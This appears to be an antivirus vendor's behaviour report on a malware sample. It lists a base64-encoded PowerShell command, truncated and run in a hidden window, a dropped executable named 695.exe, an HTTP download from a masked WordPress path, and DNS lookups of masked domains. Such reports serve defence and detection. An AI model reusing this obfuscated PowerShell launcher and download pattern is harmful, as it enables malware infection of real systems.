Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AGEAdQBjAGgAeABlAGMAaAB6AG8AaQBoAG4AbwB1AHQAaAA9ACcAYwBvAHUAawBxAHUAZQBjAGgAcQB1AG8AYQBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAHUAYABSAG...
Modifies file system
Creates the following files
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\695.exe
Network activity
TCP
HTTP GET requests
- http://ne#####ltextiles.com/wp-includes/RGYpUp/
UDP
- DNS ASK qu##9.com
- DNS ASK ne#####ltextiles.com
- DNS ASK li####angcorp.com
- DNS ASK ch###hui.com
- DNS ASK di###alcon7.net
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AGEAdQBjAGgAeABlAGMAaAB6AG8AaQBoAG4AbwB1AHQAaAA9ACcAYwBvAHUAawBxAHUAZQBjAGgAcQB1AG8AYQBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAHUAYABSAG...' (with hidden window)
